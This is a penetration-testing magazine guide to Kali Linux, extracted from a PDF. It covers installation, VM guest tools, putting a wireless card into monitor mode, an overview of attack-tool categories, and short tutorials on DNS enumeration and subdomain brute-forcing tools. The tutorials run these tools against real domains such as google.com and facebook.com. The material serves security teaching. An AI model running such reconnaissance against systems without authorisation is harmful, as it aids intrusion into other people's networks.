KALI LINUX THE ULTIMATE GUIDE Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or USB port on your computer, check out the Kali Linux Network Install. Installation Minimum requirements • A minimum of 8 GB disk space for the Kali Linux install. • For i386 and amd64 architectures, a minimum of 512MB RAM. • CD-DVD Drive / USB boot support • You will also need an active Internet connection before installation. This is very important or you will not be able to configure and repositories during installation. When you start Kali you will be presented with a Boot Install screen (see Figure 1). You may choose which type of installation (GUI based or Text Based) you would like to perform.

Figure 1. Kali Linux Boot Screen Select the local language preference, country, and keyboard preferences (see Figure 2).

Figure 2. Language Preference 20

KALI LINUX THE ULTIMATE GUIDE Select a hostname for the Kali Linux host (see Figure 3). The default hostname is Kali.

Figure 3. Selecting a hostname for Kali Select a password (see Figure 4). Simple passwords may not work, so choose something that has some degree of complexity.

Figure 4. Creating a root password The next prompt asks for your time zone. Modify accordingly and select Continue. Figure 5 shows selecting Eastern Standard time. The installer will ask to setup your partitions (see Figure 6). If you are installing Kali on a virtual image, select Guided Install – Whole Disk. This will destroy all data on the disk and install Kali Linux. Keep in mind on a virtual machine, only the virtual disk is getting destroyed. 21

KALI LINUX THE ULTIMATE GUIDE

Figure 5. Setting time zones

Figure 6. Partitioning your system

Figure 7. Partition Details Advanced users can select manual configurations to customize partitions. Kali also offers the option of using LVM, logical volume manager. LVM allows you to manage and resize partitions after installation. In theory, it is supposed to allow flexibility when storage needs change from initial installation. However, unless your Kali Linux needs are extremely complex, you most likely will not need to use it. The last window displays a review of the installation settings. If everything looks correct, select yes to continue the process as shown in Figure 7. 22

KALI LINUX THE ULTIMATE GUIDE Kali Linux using central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via HTTP protocol. If your network uses a proxy server, you will also need to configure the proxy settings for you network (see Figure 8). Kali will be prompt to install GRUB (see Figure 9). GRUB is a multi-bootlader that gives the user the ability to pick and bootup to multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to duel boot, you will want to make sure GRUB recognizes the other operating systems in order for it to give users the options to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux. Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select continue to reboot your system (see Figure 10).

Figure 8. Configuring a Network Mirror

Figure 9. Installing GRUB

Figure 10. Finish Installation

Kali Linux and VM Image first run On some Kali installation methods, you will be asked to set the root password. When Kali Linux boots up, enter the root username and the password you selected (see Figure 11). If you downloaded a VM image of Kali, you will need the root password. The default user name is root and password is: toor.

23

KALI LINUX THE ULTIMATE GUIDE

Figure 11. Booting Kali for the first time

Figure 12. Prepping Kali for VMWare Tools

Figure 13. Prepping Kali for VMWare Tools (con’t)

Kali VMWare Tools Installation The first thing you need to do on Kali Linux is prep the system for VMWare Tools (see Figure 12). You only need to install VMWare tools if you are installing Kali on VMWare. If you are installing Kali on other virtual platforms you do not need this step. To install VMWare VM Tools issue the following commands (Note: all commands are typed as one line in the terminal):

24

KALI LINUX THE ULTIMATE GUIDE echo cups enabled >> /usr/sbin/update-rc.d echo vmware-tools enabled >> /usr/sbin/update-rc.d apt-get install gcc make linux-headers-$(uname -r)

Note: This is typed as one line – see Figure 13. ln -s /usr/src/linux-headers-$(uname -r)/include/generated/uapi/linux/version.h /usr/src/linuxheaders-$(uname -r)/include/linux

Now you are ready to mount the VM Tools CD. Simply go to the menu in VMWare and install VM Tools (see Figure 14). NOTE: I did this from VMWare Fusion, but the process will be the same regardless of VMWare platform. Now go back to Kali Linux and use the following commands: mkdir /mnt/vmware mount /dev/cdrom /mnt/vmware/ cp -rf /mnt/vmware/VMwareTools* /tmp/

Figure 14. Loading VMWare Tools

Figure 15. Copying VMWare tools to temporary folder

Figure 16. Unpacking VMWare Tools

25

KALI LINUX THE ULTIMATE GUIDE

Figure 17. VirtualBox Guest Additions

Figure 18. VirtualBox Guest Additions Next, you will change to the /tmp directory and run the VM Tools installation script. cd /tmp/ tar zxpf VmwareTools-*.tar.gz cd vmware-tools-distrib/

Lastly type: ./vmware-tools-install.pl to run the VM Tools installation script. Follow the onscreen instructions when you run the script.

Installing Kali Linux Virtual Box You can also install Kali Linux on Oracle’s Virtual Box virtualization platform. Virtual Box is a popular platform because it is often distributed free under the GNU General Public License. In order to install Kali Linux, you must be using version 4.22 or higher for virtual box. 26

KALI LINUX THE ULTIMATE GUIDE Go thru the steps described above to download the ISO image of Kali Linux and install it in virtual box. When Kali Linux boots up, you will need to install additional software to get full keyboard and mouse support, along with other Virtual Box features. As described in the official Kali Linux documentation (source: http://docs.kali.org/general-use/kali-linuxvirtual-box-guest), once you have booted into your Kali Linux within Virtual Box, open a terminal window and issue the following command to install the Linux Kernel headers. apt-get update && apt-get install -y linux-headers-$(uname -r)

Once this is complete you can now attach the Guest Additions Virtual BOX tools CD. Selecting Devices from the VirtualBox Menu and selecting Install Guest Additions accomplish this. This will mount the GuestAdditions ISO to the virtual DVD Drive in your Kali Linux virtual machine. When prompted to autorun the DVD, click the Cancel button (see Figure 17). From the terminal window, copy the VboxLinuxAdditions.run file from the Guest Additions CD-Rom to a path on your local system. Ensure it is executable and run the file to begin installation. cp /media/cd-rom/VBoxLinuxAdditions.run /root/ chmod 755 /root/VBoxLinuxAdditions.run cd /root ./VBoxLinuxAdditions.run

Reboot the Kali Linux VM to complete the Guest Additions installation (see Figure 18). You should now have full mouse and screen integration as well as the ability to share folders with the host system.

Creating Shared Folders with Kali Linux and Virtual Box In order to share folders on your host system with your Kali Linux VM, there are a few short steps that need to be completed. From the VirtualBox Manager, select your Kali Linux VM instance and click on the Shared Folders link in the right window pane. This will launch a pop up window for adding shared folders. Within this window click the icon to add a folder (see Figure 19).

Figure 19. VirtualBox Shared Folders Host Configuration 27

KALI LINUX THE ULTIMATE GUIDE In the Folder Path text box, provide the path to the folder you would like to share, or click the drop-down arrow to browse your host system for the path. Select the check boxes that allow for Auto-mount and Make Permanent and click the OK button both times when prompted. Your shared folders will now be available in the media directory. You can create a bookmark or a link for easier access to the directory (see Figure 20).

Figure 20. VirtualBox Shared Folders

Figure 21. Alfa Wireless Card

28

KALI LINUX THE ULTIMATE GUIDE

Installing a Wireless Adapter on Kali Linux Kali Linux has numerous wireless testing tools. Installing a wireless card to be used for wireless testing with Kali Linux is a straightforward task as long as you are using a card that is supported by Kali Linux. My favourite adapters are the Alfa brand of cards (see Figure 21). I am using the Alfa AWUS051NH adapter. Almost any Alfa wireless adapter will work. I am a big fan of the AWUS051NH adapter because it’s a duel band adapter. However, this card is very difficult to find since it is no longer made, but you should have luck on eBay and other places.

Figure 22. iwconfig command The iwconfig command will show any wireless cards in the system. I am using a RealTek wireless card. Linux ships with the RealTek drivers, making it a Linux plug and play wireless card. The operating system recognizes a wireless interface named wlan0. My next step will be to enable the wireless interface. This is accomplished by issuing the ifconfig command (see Figure 23).

wlan0 up

Figure 23. ifconfig wlan command I need to understand which wireless networks my wireless card sees. I issue the iwlist command (see Figure 24).

wlan0 scanning

Figure 24. iwlist scanning command This command forces the wireless card to scan and report on all wireless networks in the vicinity (see Figure 25). As you can see from this example above, Kali command found my target network: Wireless Lab. It has also found the MAC address of my access point: 0E:18:1A:36:D6:22. This is important to note because I want to limit my attack to this specific access point (to ensure we are not attacking or breaking anyone else’s password). Secondly, we see the AP is transmitting on channel 36. This is important because it allows us to be specific on which wireless channel we will want our wireless card to monitor and capture traffic from. The next step is to change the wireless card to monitoring mode. This will allow the wireless card to examine all the packets in the air. We do this by creating a monitor interface using airmon-ng (see Figure 26). Issue the airmon-ng command to verify that airmon-ng sees your wireless card. From that point, create the monitor interface by issuing the command: airmon-ng start wlan0.

29

KALI LINUX THE ULTIMATE GUIDE

Figure 25. iwlist results

Figure 26. Creating a wireless promiscuous interface

Figure 27. Ifconfig Next, run the ifconfig command to verify the monitor interface is created (see Figure 27). We can see mon0 is created. Now verify that the interface mon0 has been created (see Figure 28).

Figure 28. mon0 – Wireless Promiscuous Interface Kali Linux now has a wireless interface in monitor mode. You should be able to use most of the wireless tools found in Kali. 30

KALI LINUX THE ULTIMATE GUIDE

Kali Toolset Overview Kali Linux offers a number of customized tools designed for penetration testing. Tools are categorized in the following groups as seen in dropdown menu shown in Figure 29. Information Gathering

These are reconnaissance tools used to gather data on your target network and devices. Tools range from identifying devices to protocols used. Vulnerability Analysis

Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering reconnaissance tools. Web Applications

These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this book come directly from this category. Although web applications do not always refer to attacks against web servers, they can simply be web-based tools for networking services. For example, web proxies will be found under this section. Password Attacks

This section of tools primarily deals with brute force or the offline computation of password or shared keys used for authentication.

Figure 29. Kali Menu Wireless Attacks

These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools will be found here, including tools such as aircrack, airmon, and wireless password cracking tools. In addition, this section has tools related to RFID and Bluetooth vulnerabilities as well. In many cases, the tools in this section will need to be used with a wireless adapter that can be configured by Kali to be put in promiscuous mode. Exploitation Tools

These are tools used to exploit vulnerabilities found in systems. Usually vulnerability is identified during a vulnerability assessment of a target. Sniffing and Spoofing

These are tools used for network packet captures, network packet manipulators, packet crafting applications, and web spoofing. There are also a few VoIP reconstruction applications. Maintaining Access

Maintaining access tools are used once a foothold is established into a target system or a network. It is common to find compromised systems having multiple hooks back to the attacker to provide alternative routes in the event a vulnerability that is used by the attacker is found and remediated.

31

KALI LINUX THE ULTIMATE GUIDE Reverse Engineering

These tools are used to disable an executable and debug programs. The purpose of reverse engineering is analyzing how a program was developed so it can be copied, modified, or lead to development of other programs. Reverse engineering is also used for malware analysis to determine what an executable does, or by researchers to attempt to find vulnerabilities in software applications. Stress Testing

Stress testing tools are used to evaluate how much data a system can handle. Undesired outcomes could be obtained from overloading systems, such as causing a device controlling network communication to open all communication channels or a system shutting down (also known as a Denial of Service attack). Hardware Hacking

This section contains Android tools, which could be classified as mobile, and Ardunio tools that are used for programming and controlling other small electronic devices. Forensics

Forensics tools are used to monitor and analyze computer network traffic and applications. Reporting Tools

Reporting tools are methods to deliver information found during a penetration exercise. System Services

This is where you can enable and disable Kali services. Services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH. NOTE: There are other tools included in the Kali Linux build such as web browsers, quick links to tune how the Kali Linux build is seen on the network, search tools, and other useful applications.

Updating Kali Linux After you have Kali Linux setup, you will want to update the packages. You do so by issuing the apt-get update command (see Figure 30). Next, issue the apt-get upgrade command. You may be asked to confirm disk space and other warning messages. Type Y to continue (see Figure 31).

Figure 30. apt-get update command

Figure 31. apt-get upgrade command 32

KALI LINUX THE ULTIMATE GUIDE

Figure 32. updatedb command Finally, the updatedb command from a terminal window (see Figure 32). This command will ensure the applications are in the Kali database and can be found when a user executes the locate command.

Summary Congratulations, you have successfully installed and updated Kali Linux. Kali is a powerful penetration platform. I recommend that you play around with Kali. You will find some key differences between BackTrack and Kali, and some of these differences take time to learn. However, I am sure you will appreciate the power and flexibility of the platform. Happy hacking!

About the Author

Aamir Lakhani is a leading Cyber Security architect. Lakhani is responsible to provide IT security solutions to major commercial and federal enterprise organizations around the world. Lakhani leads projects that implement security postures for Fortune 500 companies, the US Department of Defense, major healthcare providers, educational institutions, and financial and media organizations. Lakhani has designed offensive counter defense measures for defense and intelligence agencies, and has assisted organizations in defending themselves from active strike back attacks perpetrated by underground cyber groups. Lakhani is considered an industry leader in support of detailed architectural engagements and projects on topics related to cyber defense, mobile application threats, malware and Advanced Persistent Threat (APT) research, and Dark Security. Lakhani is the author of the soon to be released book Web Penetration Testing with Kali Linux, in conjunction with PackT Publishing. Writing under the pseudonym Dr. Chaos, Lakhani also operates the DrChaos.com blog. In its recent list of 46 Federal Technology Experts to Follow on Twitter, FedTech magazine described Aamir Lakhani as “a blogger, infosec specialist, super hero...and all around good guy.” World Wide Technology, Inc. (WWT) is a leading Systems Integrator providing technology products, services, and supply chain solutions to customers around the globe. WWT understands today’s advanced technologies, including Unified Communications, Security, Data Center, Wireless Mobility, and eCommerce. When properly planned, procured, and deployed, these business solutions reduce costs, increase profitability and ultimately improve a company’s ability to effectively serve their customers. Founded in 1990, WWT has grown from a small startup to a world-class organization exceeding $5 billion in revenue and over 2,200 highly trained employees. WWT continues to achieve consistent financial growth and provide our partners with uncommon strength and stability.

33

KALI LINUX THE ULTIMATE GUIDE

How to Find Files in Kali Linux by Rajesh Kumar In this tutorial I will show how can you find a file or tool path. I will not make it more complicated, so I will just show you some useful and easy commands which will help you in your Linux work.

Step 1. find

– Find one or more files assuming that you know their approximate filenames (Figure 1).

Syntax – find

/ -name ‘file name’

Example – find

/ -name mrquiety.txt

Figure 1. FIND command In the above example, the system will search for any file named mrquiety.txt on the root and all subdirectories from the root. Step 2. locate

– lists files in databases that match a pattern (Figure 2).

Syntax – locate

‘name’

Example – locate

dnsenum

Figure 2. Locate command 34

KALI LINUX THE ULTIMATE GUIDE In the above example, the system will locate dnsenum on the local machine.

Step 3. whereis

– locate a binary, source, and manual page files for a command (Figure 3).

Syntax – whereis

‘name’

Example – whereis

dnsenum

Figure 3. Whereis command advertisement

KALI LINUX THE ULTIMATE GUIDE

How to Use Detect_sniffer6 by Rajesh Kumar Sniffing detection is basically detecting if there are any sniffers in your network. The main feature of sniffers that is used to detect them is that they place the network card in promiscuous mode, listening for all traffic. Typically, a sniffer is placed on a machine with a full TCP/IP stack which will be affected by this mode (stackoverflow.com).

Step 1. How to open detect_sniffer6 A. GUI Method (Figure 1). Applications → Kali Linux → Information Gathering → Live Host Identification → detect_sniffer6

Figure 1. Opening detect_sniffer6 in the GUI B. Open the terminal, type detect_sniffer6, and hit Enter (Figure 2).

Figure 2. Opening detect_sniffer6 in the terminal 36

KALI LINUX THE ULTIMATE GUIDE

Step 2. This is our BackTrack 5 (target machine). Here, we are running Wireshark so we can detect a sniffer in our Kali Linux. If you want to test this tutorial you also need to run Wireshark before other steps (Figure 3).

Figure 3. Wireshark

Step 3. In the Kali Linux OS, we run the command detect_sniffer6 eth0 (here, eth0 is Kali Linux’s interface name – see Figure 4) and we got our target ipv6 address (Figure 5). Syntax – detect_sniffer6 interface Example – detect_sniffer6 eth0

name

Figure 4. detect_sniffer6 eth0 command 37

KALI LINUX THE ULTIMATE GUIDE

Figure 5. Ipv6 address found

advertisement

KALI LINUX THE ULTIMATE GUIDE

How to Use DNSenum in Kali Linux by Rajesh Kumar DNSenum – this tool is programmed in perl. It was designed with the purpose of enumerating DNS information about a domain. Thanks to this tool, we can get following: 1. Get the host’s address 2. Get the name servers 3. Get the MX record 4. Trying Zone Transfers 5. BIND Version 6. Get extra names and subdomains via google scraping 7. Brute force subdomains from file, can also perform recursion on subdomains that have NS records 8. Perform reverse lookups on netranges 9. Write to domain_ips.txt file the ip-blocks

Step 1. How to open DNSenum a. GUI method (Figure 1). Application → Kali linux → information Gathering → DNS Analysis → dnsenum

Figure 1. Opening DNSenum from the GUI

39

KALI LINUX THE ULTIMATE GUIDE b. Open the terminal, type dnsenum, and hit Enter. Read all commands (Figure 2).

Figure 2. Opening DNSenum from the terminal

Step 2. In the terminal, type dnsenum domain, and hit Enter. Type ex- dnsenum facebook.com. After pressing enter, you will see all the information like host’s address, name servers, MX, Zone transfer, etc. Note – do not add www within the domain (Figures 3 & 4).

Figure 3. Valuable information about the domain gained 40

KALI LINUX THE ULTIMATE GUIDE

Figure 4. More valuable information

Step 3. Extra names and subdomains via Google scraping – most of the time, this is not working with all domains (Figure 5). -p, --pages

The number of google search pages to process when scraping names, the default is 20 pages, the -s switch must be specified. -s, --scrap

The maximum number of subdomains that will be scraped from google.

Figure 5. Extra names and subdomains via Google scraping 41

KALI LINUX THE ULTIMATE GUIDE NOTE: Since this is not functional, you can manually run the command in a Google search: “allinurl: -www site:DOMAIN-NAME-HERE.”

Step 4. Brute forcing subdomains -f, --file

Read subdomains from this file to perform brute force (Figure 6).

Figure 6. Brute forcing subdomains advertisement

www.nsfx.com

KALI LINUX THE ULTIMATE GUIDE

How to Use Dnsdict6 and Get the IPv6/IPv4 Address of a Domain by Rajesh Kumar Dnsdict6 is an information gathering tool which is used for gathering information from a website. Dnsdict6 can scan a website and, as result it, can show you how many sub-domains or domains are available. It can also scan IPv6/IPv4 addresses. This tool is quite powerful because it also extracts those sub-domains which are restricted or invisible for users. Overall, this is a nice tool for gathering information from a website.

Step 1. How to open Dnsdict6 A. GUI method (Figure 1). Applications → Kali linux → Information Gathering → DNS Analysis → dnsdict6

Figure 1. Opening Dnsdict6 from the GUI B. Open the terminal, type dnsdict6, and hit Enter (Figure 2).

Figure 2. Opening Dnsdict6 from the terminal 43

KALI LINUX THE ULTIMATE GUIDE

Step 2. This command is used to extract sub-domains of Google with their IPv4 and IPv6 information (Figure 3). Syntax – dnsdict6

domain name

Example – dnsdict6

google.com

Figure 3. Extracting sub-domains with their IPv6/IPv4 information

Step 3. Check one more command type: dnsdict6 –d -4 google.com (domain name). Here, -d is used to display information on Name Servers and MX Records, and -4 is used to dump IPv4 addresses (Figure 4).

44

KALI LINUX THE ULTIMATE GUIDE

Figure 4. Gathering Name Servers, MX Records, and IPv4/IPv6 addresses advertisement

KALI LINUX THE ULTIMATE GUIDE

How to Use Dnsmap in Kali Linux by Rajesh Kumar Dnsmap is a passive network mapper and normally known as subdomain brute forcer. It is used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. The tool enables to discover all sub domains associated to a given domain. We can find remote access servers, misconfigured servers, new domain names which allow you to assign network block non-obvious. Some Features • IPv6 support • Obtain all IP addresses (A records) associated to each successfully brute forced subdomain, rather than just one IP address per subdomain • Discover embedded devices configured with dynamic DNS services • Brute forcing by using a user-supplied wordlist • Saving the results in human-readable and CSV format for easy processing

Step 1. How to open dnsmap A. GUI method (Figure 1). Applications → Kali Linux → Information Gathering → DNS Analysis → dnsmap

Figure 1. Opening dnsmap in the GUI

46

KALI LINUX THE ULTIMATE GUIDE B. Open the terminal and type dnsmap, and hit Enter (Figure 2).

Figure 2. Opening dnsmap in the terminal

Step 2. This command is used to start brute forcing the domain (Figure 3). Syntax – dnsmap

domain name

Example – dnsmap

google.com

Figure 3. Starting a brute force on the target domain 47

KALI LINUX THE ULTIMATE GUIDE

Step 3. This command is used to save the result in a text file (Figure 4). Syntax – dnsmap

domain name –r path

Example – dnsmap

google.com –r /root/

Figure 4. Saving the result in a text file

3A. You can see your saved file here (Figure 5).

Figure 5. Saved file visible in the Home folder

48

KALI LINUX THE ULTIMATE GUIDE

Step 4. This command is used to save results in a csv file (Figure 6). Syntax – dnsmap

domainname –c path

Example – dnsmap

google.com –c /root/

Figure 6. Saving results as a csv file 4 A. You can see your saved file here (Figure 7).

Figure 7. CSV file saved and visible in the Home folder

49

U P D AT E NOW WITH

STIG

AUDITING

IN SOME CASES

nipper studio

HAS VIRTUALLY

REMOVED the

NEED FOR a

MANUAL AUDIT CISCO SYSTEMS INC. Titania’s award winning Nipper Studio configuration auditing tool is helping security consultants and enduser organizations worldwide improve their network security. Its reports are more detailed than those typically produced by scanners, enabling you to maintain a higher level of vulnerability analysis in the intervals between penetration tests. Now used in over 45 countries, Nipper Studio provides a thorough, fast & cost effective way to securely audit over 100 different types of network device. The NSA, FBI, DoD & U.S. Treasury already use it, so why not try it for free at www.titania.com

www.titania.com

View more...

Comments

Copyright ©2017 KUPDF Inc.
SUPPORT KUPDF